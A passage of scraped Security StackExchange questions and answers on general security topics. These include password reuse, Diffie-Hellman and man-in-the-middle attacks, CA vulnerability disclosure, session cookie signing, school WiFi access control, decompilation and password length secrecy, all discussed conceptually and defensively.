will begin issuing wildcard certificates on Jan 2018 ) LE is now issuing wildcard certificates using the updated ACMEv2 protocol LE certificates have an expiration of 90 days LE only issues domain- or DNS-validated certificates (they don't plan to issue OV or EV, hence they only validate ownership and not the entity requesting the certificate) Current very-restrictive rate limiting † (they will continue to relax the limit while getting closer to the end of the beta) The points above are not necessarily downsides. However, they are business decisions that may not meet your specific requirements, and in that case they will represent downsides compared to other alternatives. † the main rate limit is 20 certs per registered domain per week. However this does not restrict the number of renewals you can issue each week.
{ "source": [ "https://security.stackexchange.com/questions/90972", "https://security.stackexchange.com", "https://security.stackexchange.com/users/18591/" ] }
91,006
I am not asking why hashing should be done. Instead, I want to know how to prevent that developers record user passwords to hack their user's other accounts, especially their email. Couldn't they store their user's passwords in plaintext without the users knowing? Is there any way for a user to detect/prevent this?
Of course they could, but then they could also just email themselves every time you change your password. Now, depending on the type of system, there are plenty of regulations, audits, reviews, and processes that might be relevant to ensure that the developers don't do this, or many other types of malicious activity. However, you, as a consumer, usually do not have much insight into any of this - except for when it goes wrong, for example if they email you your original password when you ask to reset it. But you're asking the wrong question here. Yes, it is important that whatever systems you use are developed securely, but that will never remove the element of implicit trust you will always have in the system itself - and, in this context, the developers are equivalent to the system itself. The real question you should be asking - and indeed you seem to be implying this - is how to protect your other accounts, on other systems, from a malicious developer or system . The answer is simple, really - use a different password for each system. Allow me to repeat that, for emphasis: NEVER REUSE PASSWORDS ON DIFFERENT SYSTEMS. Create a unique (strong, random, etc) password for each site, and never ever enter your password for SiteA on to SiteB. Because as you intuitively noted, if SiteB has your password for SiteA in any form, then that password is no longer secure from SiteB. Just for funsies, here is an xkcd on this : One last note, if you're starting to worry "How in heck am I going to remember a strong password independently for each different site??!!?" - take a look at this question here on passphrases , and also look into password managers (e.g. Password Safe, Keepass, LastPass, 1Pass, etc).
{ "source": [ "https://security.stackexchange.com/questions/91006", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78094/" ] }
91,042
The answers to this question , and the associated xkcd got me wondering: if I use different account names in every service, then can I use the same hard-to-crack password in each? I'm thinking that cross-site password hacking, a-la-xkcd, is done by a machine, not a person. So it's easy to have usernames/emails that are site dependent (for example, all email addressed to @gregories.net comes to me, so I can have [email protected] as the email for my bank). That's a lot easier to remember than a bunch of secure passwords, but if the bank gets hacked, [email protected] is not going to work anywhere else. What's the problem with this?
Big data analysis means that your different usernames probably aren't as disassociated from one another as you think they are. In other words, they are likely all identifiable as yours. But perhaps the bigger issue is that if your password is compromised in one attack, then it becomes part of a password database the attackers can use against other password databases. Regardless of your usernames, they'll still (potentially) compromise your other accounts just by virtue of already having your common password in their database. More recent attack vectors use heuristic techniques more, and things like rainbow tables less, but still consider that if a heuristic approach has broken your password (and the lessons learned have been fed back into the password cracking algorithms), then it's going to break the same password everywhere you've used it. You're still better off using unique passwords for each service, IMO.
{ "source": [ "https://security.stackexchange.com/questions/91042", "https://security.stackexchange.com", "https://security.stackexchange.com/users/55509/" ] }
91,266
I always hear about backdoors and I understand the main purpose but I have some questions: In what kind of software/web application/OS can I find them ? How can I recognize one ? How do I prevent them ? Is the analogy good to compare them to have root access (in a Linux way) ? Any more relevant information about them.
In what kind of software/webapplication/OS can I found them ? Literally anything. How can I recognize one ? By reverse engineering the software and carefully analysing it for flaws in authentication and access control, as well as issues with memory access in native applications. It's the same process by which you'd find any other vulnerability. This is not a trivial task, and entire books have been written on the subject. If you're looking to know the difference between a generic security vulnerability and a backdoor, the difference is the intent of the programmer who put it there. You have to find evidence and use intuition to identify if it was purposeful or not. Usually this is not a yes/no answer. How do I prevent them ? You basically can't. You just have to expect software to be broken and have a plan to (a) keep things up to date, and (b) deal with it should there be a breach. It's not about if , it's about when . Is the analogy good to compare them to have root access (in a Linux way) ? Not exactly. A backdoor is anything that provides a lesser-authorised user to gain access to something they shouldn't. The backdoor might allow full access to an unauthenticated user, or it might allow some limited access to an unauthenticated user, or it might allow an authenticated low-privilege user to gain access to something at a higher privilege level. Any more relevent informations about them. There isn't much, really. Backdoors are just intentional faults put into code to give someone access outside of the normal security model.
{ "source": [ "https://security.stackexchange.com/questions/91266", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78043/" ] }
91,292
I stumbled across a huge security vulnerability in a Certificate Authority that is trusted by all modern browsers and computers. Specifically, I am able to get a valid signed certificate for a domain I don't own. If I had the means to become a Man In The Middle, I would be able to present a perfectly valid ssl certificate. This vulnerability required no SQL injections or coding on my part. I quite figuratively stumbled across it. What is the proper way to report this? I want to be ethical and report it to the offending CA, but I also don't want them to simply fix the vulnerability and then sweep everything under the rug. This problem seems to have been there a while, and I'm simply not smart enough to be the only one capable of finding it. I'm concerned that solely contacting the CA will result in a panic on their part, and they, fearing a DigiNotar-like incident, will do anything to keep the public from finding out. Am I allowed to also contact some major players, such as other certificate authorities or other sites such as CloudFlare or Google? (I know CloudFlare was given a heads-up about HeartBleed before the public announcement went out.) Note: I'm posting under a psuedonym account to (try to) remain anonymous for now. Edit: This question is related to another question , but I feel this vulnerability falls outside the scope of that question. This could affect essentially the entire internet (ie everyone online is a customer), and my question explicitly states that simply contacting the 'developer' (the accepted answer for the linked question) doesn't seem like the best first step to me. Edit 2: I've gotten in contact with some people, and they've advised me to avoid talking further on this forum (sorry guys!). I'll update this question later, after the vulnerability has been fully fixed and any incorrect certificates revoked. Edit 3: The details are out. I've posted more information on my personal site about the specifics of the vulnerability. The story is still ongoing, and you can read the discussion between Mozilla, Google, and the CA WoSign. Edit 4: As promised, I'm updating with a link to an article written by Ars Technica regarding this and other incidents involving WoSign. Looks like WoSign and StartCom (now owned by the same company) may be in serious danger of root revocation.
Such a claim is generally quite serious. While reaching out to the vendor in question is a responsible matter, you should certainly consider notifying the relevant root store security teams, since they are responsible for designing, evaluating, and applying the security controls to prevent this, and will likely need to directly work with the CA to ascertain the issues. In terms of responsible disclosure you should also immediately report this to each of the major root store operators: Google, Microsoft, Apple, Mozilla. Just search for " <vendor> report security bug", and the first result will tell you. These are just some of the vendors affected - e.g. not just the CA. If you are unsure about how to do this, wish to remain anonymous, or need assistance coordinating, the Chromium security team is happy to investigate, contact the appropriate CA, and coordinate with the broader industry. See https://www.chromium.org/Home/chromium-security/reporting-security-bugs for details.
{ "source": [ "https://security.stackexchange.com/questions/91292", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78318/" ] }
91,350
On almost any website that relates information about cryptography in general there is this common notion that almost all encryption/decryption algorithms should use a key as one of their inputs. The reason behind this is that encryption algorithms that don't use a key are technically useless. Because of this I cannot help but wonder how they came to that conclusion. Why is it that the common trend in cryptography is to keep the security key a secret but allow the encryption and decryption algorithms to be public. What if both the encryption and decryption algorithms were the secret? In that case there would be no need for a key anymore and it would simplify things a great deal. For example: suppose I am a software developer that wants to send textual messages from one computer to another (and back) to allow communication (a simple chat app). Suppose the computers are communicating with each other over an insecure network with the TCP/IP protocol. Suppose that I want to ensure their conversation some privacy and come up with this very basic "encryption" algorithm in which I simply add 10 to each ASCII code for each letter in the plaintext before sending it as raw bytes over the network. As such a message such as "Hello, brother!" would be intercepted by any attacker as "Rovvy6*l|y~ro|+". How can anyone intercepting the message reconstruct the original plaintext if they had no knowledge of either the encryption or decryption algorithms? What would be the best approach to breaking this cryptosystem? Is it really that easy to somehow break encryption schemes that don't use keys, that they are not viable solutions? Finally, if you want to say something like "Well....you don't need a genius to figure out that you're just adding 10 to each byte of the plaintext", I did that for simplicity's sake. If you want to make the message even more cryptic then feel free to imagine the mathematical formula being a lot more complex (such as adding 7 then subtracting 10 and then multiplying by 2).
We don't just want secrecy. We want quantifiable secrecy. The point is not only to ensure confidentiality of data, but also to be able to know that we indeed ensured confidentiality of data. When we have a public algorithm and a secret key, secrecy can be quantified. For instance, if we use AES with a 128-bit key, then we know that an attacker will have to try an average of 2 127 possible keys (i.e. way too many to actually do it) to find the right one. If instead we tried to use a secret algorithm, then we would face three big challenges: As @Xander explains, making a secure encryption algorithm is awfully hard. The only known method which offers some decent reliability is public design: publish the algorithm, let loose hundreds of cryptographers on it, and see if they can find something wrong in it. If, after a couple of years, none of them found anything bad in the algorithm, then it is probably not too weak. With a secret algorithm, you have to do all that cross-review work yourself, which is not feasible in any decent amount of time. We do not know how many "decent encryption algorithms" can exist. An attacker may try to enumerate the possible algorithms, were "possible" means "that which the designer may have come up with". Part of the issue is in the realm of psychology, so quantification will be hard. A secret algorithm still exists as source code on some computer, compiled binaries on some others, and in the head of at least one designer. Unless all the involved development computers and the designer's corpse were dissolved in a big acid cauldron, it is very hard to prevent that "secret algorithm" from leaking everywhere. On the other hand, a secret key is a small element that can be more efficiently managed and kept secret (stored in RAM only, possibly rebuilt from a key exchange algorithm like Diffie-Hellman ...). Since the algorithm will probably leak, you may as well consider it public and rely only on the secrecy of the key. By actually making the algorithm public, you may then benefit from extended review by other people, which is an almost unavoidable precondition for achieving security.
{ "source": [ "https://security.stackexchange.com/questions/91350", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78355/" ] }
91,446
Firefox dev tools show that https://www.google.com is using a certificate signed with SHA-1. Why is Google doing this when they are phasing out the certificate themselves? Shouldn't this only hurt Google's reputation and interests?
This may be a case of "do what I say, not what I do". Note that Chrome complains about use of SHA-1 for signing certificates whose validity extends beyond the end of year 2015. In this case, Google's certificate is short-lived (right now, the certificate they use was issued on June 3rd, 2015, and will expire on August 31st, 2015) and thus evades Chrome's vengeful anathema on SHA-1. Using short-lived certificates is a good idea, because it allows for a lot of flexibility. For instance, Google can get away with using SHA-1 (despite Chrome's rigorous stance) because the algorithms used to guarantee the integrity of a certificate do not need to be robust beyond the certificate expiration; thus, they can use SHA-1 for certificates that live for three months as long as they believe that they will get at least a three-month prior notice when browsers decide that SHA-1 is definitely and definitively a tool of the Demon, to be shot on sight. My guess as to why they still use SHA-1 is that they want to interoperate with some existing systems and browsers that do not support SHA-256 yet. Apart from pre-SP3 Windows XP systems (that should be taken off the Internet ASAP), one may expect that there still linger a number of existing firewalls and other intrusion detection systems that have trouble with SHA-256. By using a SHA-256-powered certificate, Google would incur the risk of making their site "broken" for some customers -- not by Google's fault, but customers are not always fair in their imprecations. So Google's strategy would appear to be the following: They configure Chrome to scream and wail when it sees a SHA-1 certificate that extends into 2016 or later. Because of all the scary warnings, users of existing SSL servers (not Google's) begin to desert (e.g. they don't complete their online banking transactions, because they are afraid), forcing the server administrators to buy SHA-256 certificates. Now these new certificates "break" these sites in the eyes of the poor people that must live with outdated browsers or firewalls. This ought to force people to upgrade these browsers and firewalls. Meanwhile, Google's reputation is unscathed, because their site never trigger any warning or broke an old firewall -- since it still uses SHA-1 ! When the whole World has switched to SHA-256, and all firewalls have been updated, the path becomes clear for Google, and they can use SHA-256 for their new certificates. It is a pretty smart (and somewhat evil) strategy, if they can pull it off (and, Google being Google, I believe they can).
{ "source": [ "https://security.stackexchange.com/questions/91446", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78439/" ] }
91,476
In the Atlantic article " Hacked! " it says: My wife’s password was judged as “strong” when she first chose it for use with Gmail. But it was a combination of two short English words followed by numbers, so if it didn’t leak from some other site, it might just have been guessed in a brute-force attack. For reasons too complex to explain here, even some systems, like Gmail’s, that don’t allow intruders to make millions of random guesses at a password can still be vulnerable to brute-force attacks. What vulnerability is the author referring to?
For starters, that article misuses terminology. Whatever vulnerability they may be referring to it seems pretty blatant that it is not "brute force" as that would contradict the premise of that very sentence. As another answer suggested it's possible that some form of social engineering was employed, but in this case any rounds of "guessing" left would not be brute force at all but would be cleverly leveraging known data points. Additionally, it misidentifies the most likely security failure. Altogether more likely in the case described in the article is a compromised database on another site . The article specifically allows for this when it says "if it didn’t leak from some other site", implying that his wife does not use unique passwords per site. If you don't use unique passwords 1 then all bets are off 2 and you cannot blame Google if your Gmail account is compromised 3 that all your stuff is only as safe as the weakest site you use—a least-common-denominator approach that is bound to get you int trouble as for any given set of sites it is almost guaranteed that one of them has mishandled user data! 1. You should. Full stop. 2. In addition to (but not in place of) using unique passwords, enabling two-factor authentication would also mitigate against this attack vector. 3. Note again the terminology issue here. A compromised account (as in my usage) is different than a hacked account (as in the article's usage). In the most likely scenario the Gmail account was not hacked—no security measure at Google failed—the attacker was merely able to login with the password they hacked from somewhere else.
{ "source": [ "https://security.stackexchange.com/questions/91476", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77025/" ] }
91,641
The chief security officer of a medium sized IT company (400-500 employees) recently released a bulletin in which he stated that DDOS attacks are not a security risk but an operational one. Also I was told that in a previous meeting he denied that DDOS or related attacks are his responsibility. From my understanding security comprises three major themes: Confidentiality, Integrity, Availability In my opinion DDOS attacks are clearly a security risk as they directly target availability of a service - and thus are also clearly within the responsibilities of a chief security officer. So who is right? Are DDOS attacks a security or operational risk?
I think that is a false dichotomy, and your CSO is being plain silly. Though I am fond of the silliness, the security department should be driving risk mitigation. Squabbling over areas of "responsibility" are obviously not productive, though it might fit into the general corporate culture. While there are various ways of qualifying the realm of security and their responsibility - the CIA triad is one, but there are others - a mature, responsible CSO would at the least be pushing for a solution. I have heard some say that the distinction between "security risk" and "operational risk" is whether there is a potential threat actor, or merely accidental or misuse. While this does make a lot of sense, I think a more pragmatic approach would be to simply accept that there is substantial overlap between the two - and that just means there are more resources to work on the problem, not that everybody gets to abdicate responsibility. That said - in this specific case, the process I would recommend is having the CSO (or technical people in his department) drive the mitigation procedure, define a framework for levels of risk, etc - and then hand it off to operations to implement a fitting solution. Perhaps the security folk can recommend a solution, or maybe they should just define metrics that the solution should meet, depending on how technical / hands-on the team is. In this way, the company can handle the fact that while the risk is a security risk, the solution is an operational one.
{ "source": [ "https://security.stackexchange.com/questions/91641", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16145/" ] }
91,681
My bank called me the other day and the person who spoke to me failed to give me a single evidence that he is calling from my bank. The bank number is hidden just like many other companies maybe because they use VOIP to make calls or they don't want you to ring them back on the number they call you from. The person I spoke to refused my proposal to mutual verification of our identities when I asked him to tell me my account number since all the information he revealed to know about me was my name and phone number which are available to the public.
If you're worried about the authenticity of a cold-call, don't try over-the-phone authentication in either direction. Simply ask for some basic information you can use to refer to the issue in follow-up: Name of the company/service the account is for. What is the nature of the issue/offer the caller wants to discuss? Is there a reference ID (e.g.: ticket #) for the call? Name and/or agent ID of the caller. Important: Throughout this process, you should not ever give the caller any more of your information. The main point here is to assume that someone calling you like this is an attacker, for the entire duration of the initial call. Question #1 should be answered by the caller before you even have to ask. Be especially wary if it's not. My wife once argued for a good couple of minutes with someone calling from the "Account Services Department", before she finally handed the phone to me. When I interrupted the caller to ask "Account Services Department for whom?" the caller suddenly hung up. After you've gotten all you can from the caller, hang up. Then, obtain legitimate contact information for the company from a reliable source (do not use any contact info given by the caller, without verifying it first). Once you've got known-good contact information, call the company yourself and ask about your account's status. Use information obtained from the caller as needed, to reference the incident.
{ "source": [ "https://security.stackexchange.com/questions/91681", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31356/" ] }
91,699
After reading the selected answer of "Diffie-Hellman Key Exchange" in plain English 5 times I can't, for the life of me, understand how it protects me from a MitM attack. Given the following excerpt (from tylerl's answer ): I come up with two prime numbers g and p and tell you what they are. You then pick a secret number ( a ), but you don't tell anyone. Instead you compute g a mod p and send that result back to me. (We'll call that A since it came from a ). I do the same thing, but we'll call my secret number b and the computed number B . So I compute g b mod p and send you the result (called " B ") Now, you take the number I sent you and do the exact same operation with it . So that's B a mod p . I do the same operation with the result you sent me, so: A b mod p . Here are the same 5 steps with Alpha controlling the network: You attempt to send me g and p , but Alpha intercepts and learns g and p You come up with a and attempt to send me the result of ga mod p ( A ), but Alpha intercepts and learns A Alpha comes up with b and sends you the result of gb mod p ( B ) You run Ba mod p Alpha runs Ab mod p During this whole process Alpha pretends to be you and creates a shared secret with me using the same method. Now, both you and Alpha, and Alpha and me each have pairs of shared secrets. You now think it's safe to talk to me in secret, because when you send me messages encrypted with your secret Alpha decrypts them using the secret created by you and Alpha, encrypts them using the secret created by Alpha and me, then sends them to me. When I reply to you, Alpha does the same thing in reverse. Am I missing something here?
Diffie-Hellman is a key exchange protocol but does nothing about authentication. There is a high-level, conceptual way to see that. In the world of computer networks and cryptography, all you can see, really, are zeros and ones sent over some wires. Entities can be distinguished from each other only by the zeros and ones that they can or cannot send. Thus, user "Bob" is really defined only by his ability to compute things that non-Bobs cannot compute. Since everybody can buy the same computers, Bob can be Bob only by his knowledge of some value that only Bob knows. In the raw Diffie-Hellman exchange that you present, you talk to some entity that is supposed to generate a random secret value on-the-fly, and use that. Everybody can do such random generation. At no place in the protocol is there any operation that only a specific Bob can do. Thus, the protocol cannot achieve any kind of authentication -- you don't know who you are talking to. Without authentication, impersonation is feasible, and that includes simultaneous double impersonation, better known as Man-in-the-Middle . At best, raw Diffie-Hellman provides a weaker feature: though you do not know who you are talking to, you still know that you are talking to the same entity throughout the session. A single cryptographic algorithm won't get you far; any significant communication protocol will assemble several algorithms so that some definite security characteristics are achieved. A prime example is SSL/TLS ; another is SSH . In SSH, a Diffie-Hellman key exchange is used, but the server's public part (its g b mod p ) is signed by the server. The client knows that it talks to the right server because the client remembers (from a previous initialization step) the server's public key (usually of type RSA or DSA); in the model explained above, the rightful servers is defined and distinguished from imitators by its knowledge of the signature private key corresponding to the public key remembered by the client. That signature provides the authentication; the Diffie-Hellman then produces a shared secret that will be used to encrypt and protect all the data exchanges for that connection (using some symmetric encryption and MAC algorithms). Thus, while Diffie-Hellman does not do everything you need by itself, it still provides a useful feature, namely a key exchange , that you would not obtain from digital signatures, and that provides the temporary shared secret needed to encrypt the actually exchanged data.
{ "source": [ "https://security.stackexchange.com/questions/91699", "https://security.stackexchange.com", "https://security.stackexchange.com/users/791/" ] }
91,961
I'm a teacher and IT person at a small K-12 school. The students are not supposed to have phones, laptops or access to the network. However, students being students they will try to find a way around the rules. The students manage to acquire the Wi-Fi passwords pretty much as soon as we change them. It becomes a game to them. Although they are not supposed to, they will bring their laptops and phones in and use the network. One of them will get the password, and it travels like wildfire throughout the school. It is sometimes as simple as writing it on a wall where the rest of the students can get the updated password. What can we do to keep them out of the network? I'm considering entering MAC addresses , but that's very labourious, and still not a guarantee of success if they spoof the address. Do any of you have any suggestions? Some background: There are four routers in a 50-year-old building (plenty of concrete walls). One router downstairs, and three upstairs. They are different brands and models (Netgear, Asus, Acer, D-Link) so no central administration. The school has about 30 Chromebooks and a similar number of iPads. Teachers will use their own laptops (a mix of Windows Vista, Windows 7, and Windows 8 as well as a number of Mac OS X). Some of the teachers are not at all comfortable with technology and will leave the room with their machines accessible to the students. The teachers will often leave their password off or even give it to the students when they need help. They will ask for help from the students when setting up a projector for example and leave them to it, there goes the security once again. No sooner that the teacher is out of the room than they'll go to the taskbar and look at the properties of the Wi-Fi router to get the password.
Enforce Consequences for Students Found on the Network The first thing you need to do is ensure you have a written policy outlining what devices are allowed on the network. However, if you are not consistent in the enforcement of your policy, it is useless. This should also cover the usage policies for the Teachers, including locking their computers when they are not present at the machine. You can also use Group Policy to prevent users from being able to view the WiFi password. Technical Measures The following consists of various options for limiting the use of student devices on the school network. The most effective is WPA2-Enterprise. The others are included because they may be effective enough in limiting unauthorized access by students and, depending on you particular network, may be easier to implement. However, the question suggests that the students are on the main network for the organization. Only WPA2-Enterprise is going to adequately protect your network from an attack of an unauthorized device. Once a PSK is known, a student has the ability to sniff teacher web traffic, and possibly capture email and windows hashes. Additionally, a malicious user could start attacking other machines directly. WPA2-Enterprise The best solution would be to implement WPA2-Enterprise, instead of using a pre shared key (WPA2-PSK). This allows individual credentials to be issued. This is implemented by installing client certificates on each machine. This requires a good bit of engineering and is not trivial to set up in larger environments. This page has some good pointers on how to deploy WPA2-Enterprise. Captive Portal As @Steve Sether mentioned, the Chillispot captive portal can be used to authenticate users once they have connected to the network. Although I don't have evidence to point to, I suspect such a portal can be bypassed by spoofing MAC and IP addresses. However, it does raise the difficulty and will be easier to manage than MAC Filtering on multiple devices. MAC Address Filtering As you mentioned, MAC addresses can be spoofed, so the effectiveness of MAC address filtering is limited. However, many phones prevent spoofing the MAC address, so this will address some of the problematic users. The iPhone for instance, needs to be jailbroken before the MAC address can be changed . The hardest part of using MAC address filtering is going to be managing the list of allowed MAC addresses especially across multiple devices from various vendors. I would also argue that there is 'legal' benefit of using MAC Address Filtering or a Captive Portal. It can be hard to claim a user was unauthorized to access a network when the password is written on a whiteboard. However, if a user has to explicitly bypass a security restriction, you have a stronger case against the activity. Using an Internet Proxy to Prevent Unauthorized Uses of HTTPS Implement a HTTPS solution that uses your own private key. You can install the corresponding certificate to the organization's machines and they won't notice anything different (though the organization should still tell the staff that HTTPS interception is occurring). However, unauthorized devices without the certificate will get a nasty message about HTTPS being invalid whenever they try to browse a secure page. Additionally, since you are decrypting the HTTPS traffic, you will be able to monitor the traffic. For instance, seeing which students log into Facebook will allow you to address those students directly. Many Content Control implementations offer the ability to decrypt HTTPS traffic. If the school already has a Content Control mechanism in place (such as Bluecoat or Net Nanny), talk to your vendor about how to implement this feature.
{ "source": [ "https://security.stackexchange.com/questions/91961", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78920/" ] }
91,964
"... they'll go to the taskbar and look at the properties of the WiFi router to get the password." is a quote from another question on this site , and is in the context of WiFi passwords. The password remaining accessible on a user's computer significantly after the user has logged in certainly seems like a security hole, although I don't know whether it's the OS's fault or the router's fault. What OSes and/or router's leave WiFi passwords accessible on a user's computer significantly after the user has logged in to WiFi?
Enforce Consequences for Students Found on the Network The first thing you need to do is ensure you have a written policy outlining what devices are allowed on the network. However, if you are not consistent in the enforcement of your policy, it is useless. This should also cover the usage policies for the Teachers, including locking their computers when they are not present at the machine. You can also use Group Policy to prevent users from being able to view the WiFi password. Technical Measures The following consists of various options for limiting the use of student devices on the school network. The most effective is WPA2-Enterprise. The others are included because they may be effective enough in limiting unauthorized access by students and, depending on you particular network, may be easier to implement. However, the question suggests that the students are on the main network for the organization. Only WPA2-Enterprise is going to adequately protect your network from an attack of an unauthorized device. Once a PSK is known, a student has the ability to sniff teacher web traffic, and possibly capture email and windows hashes. Additionally, a malicious user could start attacking other machines directly. WPA2-Enterprise The best solution would be to implement WPA2-Enterprise, instead of using a pre shared key (WPA2-PSK). This allows individual credentials to be issued. This is implemented by installing client certificates on each machine. This requires a good bit of engineering and is not trivial to set up in larger environments. This page has some good pointers on how to deploy WPA2-Enterprise. Captive Portal As @Steve Sether mentioned, the Chillispot captive portal can be used to authenticate users once they have connected to the network. Although I don't have evidence to point to, I suspect such a portal can be bypassed by spoofing MAC and IP addresses. However, it does raise the difficulty and will be easier to manage than MAC Filtering on multiple devices. MAC Address Filtering As you mentioned, MAC addresses can be spoofed, so the effectiveness of MAC address filtering is limited. However, many phones prevent spoofing the MAC address, so this will address some of the problematic users. The iPhone for instance, needs to be jailbroken before the MAC address can be changed . The hardest part of using MAC address filtering is going to be managing the list of allowed MAC addresses especially across multiple devices from various vendors. I would also argue that there is 'legal' benefit of using MAC Address Filtering or a Captive Portal. It can be hard to claim a user was unauthorized to access a network when the password is written on a whiteboard. However, if a user has to explicitly bypass a security restriction, you have a stronger case against the activity. Using an Internet Proxy to Prevent Unauthorized Uses of HTTPS Implement a HTTPS solution that uses your own private key. You can install the corresponding certificate to the organization's machines and they won't notice anything different (though the organization should still tell the staff that HTTPS interception is occurring). However, unauthorized devices without the certificate will get a nasty message about HTTPS being invalid whenever they try to browse a secure page. Additionally, since you are decrypting the HTTPS traffic, you will be able to monitor the traffic. For instance, seeing which students log into Facebook will allow you to address those students directly. Many Content Control implementations offer the ability to decrypt HTTPS traffic. If the school already has a Content Control mechanism in place (such as Bluecoat or Net Nanny), talk to your vendor about how to implement this feature.
{ "source": [ "https://security.stackexchange.com/questions/91964", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
92,122
I am learning about session middleware . You have to supply a secret or the middleware complains: app.use(session({ secret: "abc", resave: false, saveUninitialized: false, store: new MongoStore({ mongooseConnection: mongoose.connection }) })); I did some investiagation and the actual session ID is eKeYlF1DR6AtVkeFZK9vEIHSZT8e0jqZ But according to the cookie, the session ID is s%3AeKeYlF1DR6AtVkeFZK9vEIHSZT8e0jqZ.on5ifVE079C4ctKNdkNiJSh8NkQMckjd5fn%2FsxIQWCk I am confused. Why is it insecure to store the session ID in the cookie directly? Can I not store the session ID directly? It looks like the secret is a private key and the session ID is being encrypted? As I understand it, if an attacker can attain this cookie, maybe via XSS or social engineering, the attacker can still hijack the session. I am not sure what the point of the secret is.
The author of that JS library seems to have made a common, yet mistaken, assumption, though based on just enough knowledge to get things wrong. You can't just sprinkle magik crypto faerie dust and expect to get more security, like chocolate chips. What the author is missing is that once you sign the session id, and put that in the cookie - the signed session id IS the session id. That is literally the identifier with which end users will tell the server which session is theirs. It doesn't matter that the server will like to do some internal processing for associating the actual session identifier with the internal representation of the session's memory. To be clear, if the signed session id is stolen - in any way, whether via XSS, social engineering, or anything else - then the attacker will be able to simply use that signed session id to hijack the user's session, internal representation notwithstanding. That said, there is one nominal benefit in signing the cookie value before sending it to the browser: tamper detection. That is, upon receiving the user's cookie, the web application can verify that the cookie was not tampered with before using it to look up the session memory, namely by validating the signature. This might possibly prevent certain advanced / active attacks on the session management, by avoiding a session lookup on a session id that was never valid. However, this supposed benefit is doubtful, since the session id is typically just an id, used to look up the session variables. Also, most attacks targeting the session id would not be stopped by this - session hijacking, session fixation, session donation, session riding, etc... Anyway, if you really want to verify that the session cookie was not tampered with before using it, there are simpler ways than a digital signature...
{ "source": [ "https://security.stackexchange.com/questions/92122", "https://security.stackexchange.com", "https://security.stackexchange.com/users/79089/" ] }
92,195
I am still in college for a Computer Security degree and took my first assembly language based class last semester. We touched upon the subject of reverse engineering and why it is an important part of fighting malware and ill-wished applications. During my class we mainly used IDA pro, but also checked out some similar and free browser based applications. In these applications, we were able to obtain so much information about the instructions and low level code that I was wondering why we even need a human to go over it and recreate the higher level languages (like writing a 'C' version of a piece of malware). Here my question: Why can't a program use the information that is present in assembly code and turn it into a simplistic language automatically? I understand that it wouldn't look the exact same way it would when it was first written, but shouldn't it be possible to re-create it in a way that makes it easier to read and follow? It's just something that I can't wrap my head around, thanks!
Short Answer It's absolutely possible, but the accuracy and readability is a completely different matter. One clarification to be made: Reverse Engineering is not Decompiling. Long Answer Reverse Engineering is generally the process by which you take something (anything really) apart to see how it works. Disassembling is when you take a binary formatted file and interpret the machine code into is assembly code. Decompiling is interpreting the assembly code into a higher level language. I believe your question is really, Why can't decompiling a program be automated? Well it can be! There are several different Java Decompilers . Java byte-code is completely reversible due to its architecture independence. What becomes tricky is decompiling a language like C. Hex Rays does provide a C decompiler, but C is a complicated language. There are 10 different ways to accomplish the same task. What can be done in 20 lines, can be done in 3, or 10. It's the interpretation of the language that makes the automation of decompiling C difficult. Sure you can decompile C to its most simplistic instructions. Then you get lines like **(*var1) = 3; or (*bytecode)(param1) which can be a call to a function pointer. What's worse is that you must remember that these are still just an interpretation . I can't stress that enough. What if the interpretation is wrong? This is something you have to worry about at the disassembly level, but at least there are a reasonable amount of outcomes for 5-6 bytes for an instruction. Now you have to interpret 15-20 bytes in order to figure out a function call or a for-loop. If there are anti-reverse engineering techniques then it makes the interpretation even more difficult. Context plays a huge role. What's the difference between a function pointer, a char * pointer, and a uint32 ? Absolutely nothing, except the context in which its used. Compiler optimizations might use __fastcall rather than __stdcall . Which means now you have to interpret where parameters to functions are going to be; either on the stack or in a register? Inline functions, macro's, #defines will all become part of a larger subroutine. There's no real way to interpret those types of contexts.
{ "source": [ "https://security.stackexchange.com/questions/92195", "https://security.stackexchange.com", "https://security.stackexchange.com/users/79164/" ] }
92,233
Is keeping your password length secret critical to security? Does someone knowing that you have a password length of say 17 make the password drastically easier to brute force?
Well, let's start with math: If we assume that your password consists of lowers, uppers, and numbers, that's 62 characters to choose from (just to keep the math easy, real passwords use symbols too). A password of length 1 has 62 possibilities, a password of length 2 has 62^2 possibilities, ..., a password of length n has 62^n possibilities. So that means that if they know your password has exactly 17 characters, then they can skip all the passwords with length less than 17, and there are only 62^17 passwords to try. But how many passwords are there with length less than 17, compared to 62^17? Well, if we add up 62^n and divide by 62^17 we get (sum from n=1 to n=16 of 62^n ) / 62^17 = 0.016 ( link to calculation ), so checking only passwords of length 17 is only 1.6% faster than checking all passwords up to length 17 If we have a password scheme which allows all 95 printable ASCII characters , then the savings from not having to try passwords shorter than 17 drops to 1.06% ( link to calculation ). An interesting mathematical quirk about this ratio of the number of passwords shorter than n, over the number of passwords of length n, is that it doesn't really depend on n. This is because we're already very close to the asymptote of 1/95 = 0.0105. So an attacker gets the same relative, or percentage, time savings from this trick regardless of the length of your password; it's always between 1% - 2%. Though, of course, the absolute time that it takes grows orders of magnitude with each new character that you add. The maths above assume a simple brute-forcer which will try a, b, c, ..., aa, ab, ... Which is a good(ish) model for cracking properly-random computer-generated passwords, but is a terrible model for guessing human-generated passwords. Real password crackers are dictionary-based, trying words (and combinations of words) from the English dictionary, lists of leaked passwords, etc, so those calculations should be taken with a grain of salt. Another effect of knowing your length is that they don't have to try any passwords longer than 17 , which for brute-forcing algorithms that try combinations of dictionary words, could actually be a huge savings. As mentioned by @SteveSether, @xeon, and @CountIblis, disclosing the length (or entropy) of a password can also effect whether an attacker even attempts to crack your password by deterring them away from strong passwords and instead attracting them to weak ones. So if you know you have a strong password, then disclose away! However, disclosing the password lengths (or entropies) for all users in a system has the effect of making strong passwords stronger, and weak passwords weaker. Bottom Line: Telling someone the length of your password isn't the worst thing you can do, but I still wouldn't do it.
{ "source": [ "https://security.stackexchange.com/questions/92233", "https://security.stackexchange.com", "https://security.stackexchange.com/users/43059/" ] }
92,292
